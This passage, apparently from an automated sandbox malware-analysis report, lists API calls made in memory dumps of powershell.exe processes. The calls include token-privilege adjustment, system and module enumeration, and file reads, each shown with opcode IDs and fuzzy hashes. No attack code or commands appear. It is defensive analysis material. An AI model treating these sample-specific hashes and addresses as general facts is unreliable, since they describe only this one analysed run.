                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 075d0bd628144693e4709abd872a447bcb8594af9418d36a89addbeefc627ec1
                                                        • Instruction ID: d8057ed1b46a5fff47b4476dbb787c1c25d9d00a23b2c0eed1d9619e6b1e3157
                                                        • Opcode Fuzzy Hash: 075d0bd628144693e4709abd872a447bcb8594af9418d36a89addbeefc627ec1
                                                        • Instruction Fuzzy Hash: 0601DC71404740DFEB50DF19D889BA1FBA4EF04221F08C9AACD088F242D274A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 5ebccdd8a22eb41db047dc9815150a21f5fb0b84eaf3a468055d586e2c844d39
                                                        • Instruction ID: 1d7e6902b0c3c364bb8b1a33d795e299dc0a64aefe4c9a2a6ac5f1c14508b48b
                                                        • Opcode Fuzzy Hash: 5ebccdd8a22eb41db047dc9815150a21f5fb0b84eaf3a468055d586e2c844d39
                                                        • Instruction Fuzzy Hash: 8DF0FF34500740DFEB20CF05D885761FBA0EF04A21F48C0DACD094F312D675A444CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01D5A39C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: dae48d95b6e05d84de83f5ce69ae02e112eb3838af73ceb5d31c9efe0a604f2e
                                                        • Instruction ID: d4852d15cb63d28c3ce623e3298c6a98819ce8f758cc09a6d9cad942f0d697f5
                                                        • Opcode Fuzzy Hash: dae48d95b6e05d84de83f5ce69ae02e112eb3838af73ceb5d31c9efe0a604f2e
                                                        • Instruction Fuzzy Hash: E8F0A935504744DFEB609F4AD889765FBA0EF08725F08C2AADD494B353D3B5E808CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 1b4eeb6bc92c23a9cf38c782acda208f7a07df4d8637a421a88524cde36482f6
                                                        • Instruction ID: 93b9112b880f79350cba43eeaee1274cab6f1416b972895bb114146926579f73
                                                        • Opcode Fuzzy Hash: 1b4eeb6bc92c23a9cf38c782acda208f7a07df4d8637a421a88524cde36482f6
                                                        • Instruction Fuzzy Hash: EDF0A935904740DFEB209F16D889766FBA0EF55721F08C09ADD494B356D275A408CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: a393d87424c61f55f698f6d863bcd687a6070239ac1e7a45374676f7c56ee979
                                                        • Instruction ID: bbef0720b5e4664909d8eda670deda93c38cf0ff84ceec3d28fcd608a68dcb7a
                                                        • Opcode Fuzzy Hash: a393d87424c61f55f698f6d863bcd687a6070239ac1e7a45374676f7c56ee979
                                                        • Instruction Fuzzy Hash: ACF0CD31904B40DFEF50CF19D989762FBA0EF08621F08C19ADD494F352D278E504CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 3878c4f183559900df8abccdad2f4974d7e50ab78dbf79b1f676ec00c0db9a59
                                                        • Instruction ID: de7276d52a841557c720139d35f95311b7eeacebf980ef40715506f432ef8971
                                                        • Opcode Fuzzy Hash: 3878c4f183559900df8abccdad2f4974d7e50ab78dbf79b1f676ec00c0db9a59
                                                        • Instruction Fuzzy Hash: C111A3715093809FDB12CF25DD45B92FFA4EF46221F0984EBED458B263D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8d2e9d0ebd61402df1eb6f7817ce189a40d4370baf4325de3db70cc5a16374c2
                                                        • Instruction ID: 735c9be26074a7562d4d4c4efd8d4b92a7b7fe3d36f8b824f73b6cc5d52bdc65
                                                        • Opcode Fuzzy Hash: 8d2e9d0ebd61402df1eb6f7817ce189a40d4370baf4325de3db70cc5a16374c2
                                                        • Instruction Fuzzy Hash: 8D01DB75600750DFEB50DF29D9897A6FBA4EF04221F08C5AADD098B242D275E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028B07F7, Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2163193388.00000000028B0000.00000040.00000040.sdmp, Offset: 028B0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6ae8cfe6986b422ec64ea904c58e3abb347b565657606c0cc61c18b21a5bbb4
                                                        • Instruction ID: b14711675e552319ed1a857252d4926f023622e9fba0d57d1dab221736ee9c1b
                                                        • Opcode Fuzzy Hash: f6ae8cfe6986b422ec64ea904c58e3abb347b565657606c0cc61c18b21a5bbb4
                                                        • Instruction Fuzzy Hash: 3C01D676509780AFD7118F16AC41863FFA8DE87670709C5AFEC498B612C225A909CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05710860, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2173491826.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b096d29f2b31ba83146fb4fd103571dcdc741ee706c69be021304cfe0262883
                                                        • Instruction ID: 9de84bd585ac31886f786a788164fecebcce718f1ef4ef442bdaff20c30c4c94
                                                        • Opcode Fuzzy Hash: 6b096d29f2b31ba83146fb4fd103571dcdc741ee706c69be021304cfe0262883
                                                        • Instruction Fuzzy Hash: 26F0651270D3E15FC70713685CA94557F729D9752134A42D7D582CB1E6D9048C86D376
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028B081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2163193388.00000000028B0000.00000040.00000040.sdmp, Offset: 028B0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c07083f1e755692ab285c755832806649fe7446fb2fbb60574b2de790c505ba1
                                                        • Instruction ID: 49705889a4379aea6540d11470326384c36310bb7451f18169c4e78ba8023f5b
                                                        • Opcode Fuzzy Hash: c07083f1e755692ab285c755832806649fe7446fb2fbb60574b2de790c505ba1
                                                        • Instruction Fuzzy Hash: 98E092766047009BD750CF0AEC41452F794EB84A30B18C47FDC0D8B710D136B504CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D523F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152503368.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 503426f8c3da63fcbaa65092a35bb5fd0c36594e5d84f9a1895222634fd17540
                                                        • Instruction ID: e1099889116a7d0e27ca98d499c183d189e5b6a319219ab0b7e4c766aa62b87b
                                                        • Opcode Fuzzy Hash: 503426f8c3da63fcbaa65092a35bb5fd0c36594e5d84f9a1895222634fd17540
                                                        • Instruction Fuzzy Hash: 29D05E79204B818FEB168A1CC1A5B953FA4AF69B04F4644F9EC40CB6A3C768E585D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D523BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152503368.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 319bf96dd95985b1c49816627bc9f2a73d18cdcaaf5861b79c81799ed16404ba
                                                        • Instruction ID: 736880d778082eaf5ff2787f01e802a8c9d214663b43944ca258216493c35035
                                                        • Opcode Fuzzy Hash: 319bf96dd95985b1c49816627bc9f2a73d18cdcaaf5861b79c81799ed16404ba
                                                        • Instruction Fuzzy Hash: D5D05E343006818FEB15CA1CC194F5977E4AF44700F0644ECBC008B666C3A5E884C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 944 Parent PID: 2888 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01F4ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 38e546948865d72ba6867e291ae8021e44cf2eff4068681b375eb83fe1b283f7
                                                        • Instruction ID: 87547d440cca3ff4d7a891fd54cd7d2bdb7a40b160277e9cbd588a26a6c637f8
                                                        • Opcode Fuzzy Hash: 38e546948865d72ba6867e291ae8021e44cf2eff4068681b375eb83fe1b283f7
                                                        • Instruction Fuzzy Hash: 85219C765097849FEB238F25DC44B92BFB4EF06210F08849AE9858F563D271A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: c7c4dd61953d887e8975e8db06fb59ac9b18f3bc617ba9741208db7964871a08
                                                        • Instruction ID: 63c9c086bcb4e6cd2472f33eb90c0c32cba7e52d77256a6e94d7bc1f4678565d
                                                        • Opcode Fuzzy Hash: c7c4dd61953d887e8975e8db06fb59ac9b18f3bc617ba9741208db7964871a08
                                                        • Instruction Fuzzy Hash: 10117076500744DFEB21CF55D884B96FFE4EF04221F08C46AED8A8B662D732E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 5a112d1819c8be014569d16aa6d710348ce8fb773800b8011fa7c353680c5037
                                                        • Instruction ID: e6180c2584294c67393917279db3dc7ab9c713e0fc0db9266d76214b225e53ea
                                                        • Opcode Fuzzy Hash: 5a112d1819c8be014569d16aa6d710348ce8fb773800b8011fa7c353680c5037
                                                        • Instruction Fuzzy Hash: EE11E031408380AFDB228F15DC45F62FFB4EF06220F08848AED844B663C276A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 48d8244bc17bcb13e3275b14576d701e737fa0a241de9761fd0c59a3d6302fa2
                                                        • Instruction ID: 9f072fd1edbdfa2cb386211bb17f45127634c3f6a15fbb8ee3e7e6fc578eb69f
                                                        • Opcode Fuzzy Hash: 48d8244bc17bcb13e3275b14576d701e737fa0a241de9761fd0c59a3d6302fa2
                                                        • Instruction Fuzzy Hash: 0301AD36800744DFEB218F0AD885B61FFA0EF04720F08C49ADD494B612C376E418DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: c45bf5cba8fcb8fd3ff7857a9a254405bdbfe320c1692a5b0f2568ba30e0943e
                                                        • Instruction ID: e05fceaa61bc444617027030874627f0e0cdd91c5503a63c8d2fddc2848c7ce2
                                                        • Opcode Fuzzy Hash: c45bf5cba8fcb8fd3ff7857a9a254405bdbfe320c1692a5b0f2568ba30e0943e
                                                        • Instruction Fuzzy Hash: 69314A7650E3C08FEB138B759C65692BFB4AF43214F0E84DBD884CF1A3D6259809D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 775305abcb48bbf7ff7c9aeebccf1f656db90477540537058f77e639be689adc
                                                        • Instruction ID: 780a79257860572f46909deaa428c06585dc65ad16caba1001d4782d5e445dbd
                                                        • Opcode Fuzzy Hash: 775305abcb48bbf7ff7c9aeebccf1f656db90477540537058f77e639be689adc
                                                        • Instruction Fuzzy Hash: EA318271504380AFEB22CF65CC85F52BFF8EF05210F09849EE9858B293D335A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: e5a546d491f080dcab3980d0a51a36aa731dfa89ae3178c7588a71149beebe8a
                                                        • Instruction ID: 7e994f85479c46ddfec12774db91118d8ad72d12cdbc6072f07ed9dbb7960bf7
                                                        • Opcode Fuzzy Hash: e5a546d491f080dcab3980d0a51a36aa731dfa89ae3178c7588a71149beebe8a
                                                        • Instruction Fuzzy Hash: B8319871509784AFE712CB25DC45B96BFE8DF06214F0884AAE944CF293D375A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 00a0fbe4efdc29a7e11c6a5f3ef558c29219a7a5d883ec14c042e8e57e9e920b
                                                        • Instruction ID: ab7d450fbb946401fed95eab4978d79d1105aea26f895dd24bd73a1baee2ee3f
                                                        • Opcode Fuzzy Hash: 00a0fbe4efdc29a7e11c6a5f3ef558c29219a7a5d883ec14c042e8e57e9e920b
                                                        • Instruction Fuzzy Hash: 5F21E4B2509380AFE712CF64DC45B96BFB8EF06320F0884DBE985DB193C225A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 9b882593fe6b60476a8041c8aec0e48458c36bfcc5155c6aba914bd65994f085
                                                        • Instruction ID: 22290d8a2c9fb79b3b57a9006120ec1255ccb799c26acb284a6ddeda30b367d6
                                                        • Opcode Fuzzy Hash: 9b882593fe6b60476a8041c8aec0e48458c36bfcc5155c6aba914bd65994f085
                                                        • Instruction Fuzzy Hash: C231C372409380AFE722CB60CC45F96BFB8EF06210F0884DBF985CB193D225A908C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 92c660b67a3209ebac50aeaca630c3866d1b31226bc397f6193b3f48bde639ff
                                                        • Instruction ID: 7a8c1cf70f98f420b33f508cff40896c433f8c755a99bb6514c2073a3ccf1fa2
                                                        • Opcode Fuzzy Hash: 92c660b67a3209ebac50aeaca630c3866d1b31226bc397f6193b3f48bde639ff
                                                        • Instruction Fuzzy Hash: 0631717550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 5654a37d1c769fd111a9e892550c1fa0c90b85dc23d8fd5307c4fdf9c67b28c5
                                                        • Instruction ID: d6b69961b3851b955fd8f5f07349a4a19506a30e84538338707923c1129e1110
                                                        • Opcode Fuzzy Hash: 5654a37d1c769fd111a9e892550c1fa0c90b85dc23d8fd5307c4fdf9c67b28c5
                                                        • Instruction Fuzzy Hash: 73219171509380EFE722CB15CC45FA6BFA8EF46220F08849AE949DB192D665E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: b60bc29692b48d36de0a1f17bed84a13900deb6f96199ef6d249f0face4e0e7a
                                                        • Instruction ID: c05c5f393f555b34c7fad2f763a361608a0889f8d3ae2d47e43e97344469b71f
                                                        • Opcode Fuzzy Hash: b60bc29692b48d36de0a1f17bed84a13900deb6f96199ef6d249f0face4e0e7a
                                                        • Instruction Fuzzy Hash: 1721DAB6408784AFE712CB159C45FA3BFA8EF46724F0981DBF9858B193D224A905C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 03493d2a3904b83964afd79a8b021114ed6872498e62802c983c99e1e70dd505
                                                        • Instruction ID: 5e1bc0f633c1cb3a4c5cf9b6d81015e954c62f5b2d0c1d40e2282fc7fed42ac9
                                                        • Opcode Fuzzy Hash: 03493d2a3904b83964afd79a8b021114ed6872498e62802c983c99e1e70dd505
                                                        • Instruction Fuzzy Hash: 7F21A37180D3C1AFD3128B258C55B66BFB4EF47620F0981DBD884CB293D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: f2406d54c89590f300832336ec20d5696c0d3fcba4c906b5dd198ce6a449826c
                                                        • Instruction ID: 6a0aa9100b24f91a5fb5a9bb8f14db884af5340e94253022c1d832012be06ecc
                                                        • Opcode Fuzzy Hash: f2406d54c89590f300832336ec20d5696c0d3fcba4c906b5dd198ce6a449826c
                                                        • Instruction Fuzzy Hash: 51217F7540E7C0AFD3128B758C55B62BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7519b39f4c6e44afd391ac3e9e271251ee1673a91a1096d7fefa2c283668e267
                                                        • Instruction ID: 4c7c2a8369340d2d7d036bf03d1d52ae8c5624813f4c038ded47e8db0c84c359
                                                        • Opcode Fuzzy Hash: 7519b39f4c6e44afd391ac3e9e271251ee1673a91a1096d7fefa2c283668e267
                                                        • Instruction Fuzzy Hash: 5C219071500704EFEB21DF65CC85F66FBE8EF08650F04846AE9499B692D771E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: b0ddd95d4002904e0d479e7a5ed6b69a15f78e37d2be32fdf62de3af31478843
                                                        • Instruction ID: 86156fdfec709102669a66db92971687e19ec24e4ab86e7a8ef68ec3873017fa
                                                        • Opcode Fuzzy Hash: b0ddd95d4002904e0d479e7a5ed6b69a15f78e37d2be32fdf62de3af31478843
                                                        • Instruction Fuzzy Hash: 1D219271409380AFE722CF61DC45F96BFB8EF46314F09849BE9449B153C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A8B4, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: 55cb7a036abc1093ffc15c091e52bdcfb6467cf4a101455cda98bfe983fe7c56
                                                        • Instruction ID: e2d5d55239574b136f8ec737a784ab70bdb18338a6900e6837f5bc80841f7100
                                                        • Opcode Fuzzy Hash: 55cb7a036abc1093ffc15c091e52bdcfb6467cf4a101455cda98bfe983fe7c56
                                                        • Instruction Fuzzy Hash: 5321A77540D780AFD3138B25DC51B62BFB8EF87710F0981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: bdd48967331246f8ca8cfdb22209ff4516ee0c482ade5d017e788afd1b362bc7
                                                        • Instruction ID: bc0862e58c528cc577b0b6b3b2c917d3d68810c5561c580cd68a355ac5e38188
                                                        • Opcode Fuzzy Hash: bdd48967331246f8ca8cfdb22209ff4516ee0c482ade5d017e788afd1b362bc7
                                                        • Instruction Fuzzy Hash: 7721AE71600340AFFB20DF65CC85BA6FBD8EF04214F04846AE848DB282D775F904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
